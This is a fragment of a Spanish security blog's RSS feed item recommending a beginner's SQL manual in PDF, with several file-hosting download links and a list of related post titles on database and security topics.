Excelente Manual del Lenguaje SQL. Esta en formato PDF. Se tocan muchos conceptos sobre este lenguaje y se habla muy a fondo. Recomendado para los principiantes
http://4filehosting.com/file/19033/manual-completo-sql-zip.html
http://www.badongo.com/file/3368275
http://depositfiles.com/files/993302
http://files.filefront.com//;7737353;;/
http://rapidshare.com/files/36198264/manual-completo-sql.zip.html
http://www.sendspace.com/file/bpifqy
http://www.zshare.net/download/22069246dd0037/
http://www.megaupload.com/?d=SHVPKZUG



También puede interesarte...Como Recuperar Clave MySQL¿Que Mirar Cuando Auditamos una Base de Datos Oracle?Cómo configurar LDAP en Ubuntu Server o DebianManual de TrueCryptNueva Versión del CAINE, LiveCD para Informática Forense [...]]]></description>
			<content:encoded><![CDATA[<div class="entry-body">
<div>
<div class="item-body">
<div>
<p>Excelente Manual del Lenguaje SQL. Esta en formato PDF. Se tocan muchos conceptos sobre este lenguaje y se habla muy a fondo. <strong>Recomendado para los principiantes</strong></p>
<p><a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://4filehosting.com/file/19033/manual-completo-sql-zip.html" target="_blank">http://4filehosting.com/file/19033/manual-completo-sql-zip.html</a><br />
<a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.badongo.com/file/3368275" target="_blank">http://www.badongo.com/file/3368275</a><br />
<a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://depositfiles.com/files/993302" target="_blank">http://depositfiles.com/files/993302</a><br />
<a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://files.filefront.com//;7737353;;/" target="_blank">http://files.filefront.com//;7737353;;/</a><br />
<a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://rapidshare.com/files/36198264/manual-completo-sql.zip.html" target="_blank">http://rapidshare.com/files/36198264/manual-completo-sql.zip.html</a><br />
<a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.sendspace.com/file/bpifqy" target="_blank">http://www.sendspace.com/file/bpifqy</a><br />
<a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.zshare.net/download/22069246dd0037/" target="_blank">http://www.zshare.net/download/22069246dd0037/</a><br />
<a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=http://www.megaupload.com/?d=SHVPKZUG" target="_blank">http://www.megaupload.com/?d=SHVPKZUG</a></div>
</div>
</div>
</div>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?">¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</a></li><li><a href="http://www.dragonjar.org/como-configurar-ldap-en-ubuntu-server-o-debian.xhtml" title="Cómo configurar LDAP en Ubuntu Server o Debian">Cómo configurar LDAP en Ubuntu Server o Debian</a></li><li><a href="http://www.dragonjar.org/manual-de-truecrypt.xhtml" title="Manual de TrueCrypt">Manual de TrueCrypt</a></li><li><a href="http://www.dragonjar.org/nueva-version-del-caine-livecd-para-informatica-forense.xhtml" title="Nueva Versión del CAINE, LiveCD para Informática Forense ">Nueva Versión del CAINE, LiveCD para Informática Forense </a></li><li><a href="http://www.dragonjar.org/codigo-fuente-herramienta-para-sql-injection.xhtml" title="Código Fuente Herramienta para SQL Injection  ">Código Fuente Herramienta para SQL Injection  </a></li><li><a href="http://www.dragonjar.org/multiinjector-herramienta-automatica-de-inyeccion-sql.xhtml" title="MultiInjector &#8211; Herramienta Automática de Inyección SQL">MultiInjector &#8211; Herramienta Automática de Inyección SQL</a></li><li><a href="http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml" title="Cursos Gratuitos de Programacion en el SENA VIRTUAL">Cursos Gratuitos de Programacion en el SENA VIRTUAL</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/manual-de-sql-structured-query-language.xhtml/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
